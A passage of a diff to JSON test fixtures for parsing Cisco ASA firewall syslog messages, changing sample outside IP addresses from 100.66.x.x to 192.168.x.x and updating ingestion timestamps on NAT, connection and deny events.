CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364488500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17703,8 +17703,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112041652Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364493100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17750,8 +17750,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112043342Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364499100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17781,8 +17781,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17817,7 +17817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17828,8 +17828,8 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.112045086Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.364504400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:52.000Z", @@ -17866,8 +17866,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17901,7 +17901,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17910,8 +17910,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112046841Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364509600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -17947,8 +17947,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17982,7 +17982,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17991,8 +17991,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112048556Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364513400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18028,8 +18028,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18063,7 +18063,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18072,8 +18072,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112050201Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364517600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18104,8 +18104,8 @@ }, "destination": { "port": 8310, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1306, @@ -18145,7 +18145,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -18153,8 +18153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112051881Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310", + "ingested": "2021-12-09T13:31:36.364539800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -18187,8 +18187,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18223,7 +18223,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18232,8 +18232,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.112053561Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", + "ingested": "2021-12-09T13:31:36.364544300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -18249,7 +18249,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11844", "source_interface": "outside", "mapped_destination_port": 1306 @@ -18271,8 +18271,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18306,7 +18306,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18315,8 +18315,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112055226Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364549500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18352,8 +18352,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18387,7 +18387,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18396,8 +18396,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112056870Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364553700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18433,8 +18433,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18468,7 +18468,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18477,8 +18477,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112058568Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364557800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18514,8 +18514,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18549,7 +18549,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18558,8 +18558,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112060213Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364562Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18595,8 +18595,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18630,7 +18630,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18639,8 +18639,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112061881Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364566600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18676,8 +18676,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18711,7 +18711,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18720,8 +18720,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112063520Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364570800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18757,8 +18757,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18792,7 +18792,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18801,8 +18801,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112065209Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364575Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18838,8 +18838,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18873,7 +18873,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18882,8 +18882,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112067085Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364579600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18919,8 +18919,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18954,7 +18954,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18963,8 +18963,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112068731Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364584300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19000,8 +19000,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19035,7 +19035,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19044,8 +19044,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112070434Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364589Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19081,8 +19081,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19116,7 +19116,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19125,8 +19125,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112072281Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364592700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19162,8 +19162,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19197,7 +19197,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19206,8 +19206,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112073890Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364596400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19243,8 +19243,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19278,7 +19278,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19287,8 +19287,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112075545Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364601Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19324,8 +19324,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19359,7 +19359,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19368,8 +19368,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112077210Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364606800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19405,8 +19405,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19440,7 +19440,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19449,8 +19449,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112078941Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364612600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19486,8 +19486,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19521,7 +19521,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19530,8 +19530,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112080595Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364618400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19567,8 +19567,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19602,7 +19602,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19611,8 +19611,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112082328Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364624100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19648,8 +19648,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19683,7 +19683,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19692,8 +19692,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112083980Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364628400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19729,8 +19729,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19764,7 +19764,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19773,8 +19773,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112085665Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364632900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19810,8 +19810,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19845,7 +19845,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19854,8 +19854,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112087314Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364637200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19891,8 +19891,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19926,7 +19926,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19935,8 +19935,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112089014Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364642200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19972,8 +19972,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20007,7 +20007,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20016,8 +20016,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112090667Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364646700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20053,8 +20053,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20088,7 +20088,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20097,8 +20097,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112092366Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364651300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20134,8 +20134,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20169,7 +20169,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20178,8 +20178,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112093994Z", - "original": "Oct 10 2018 12:34:56 localhost 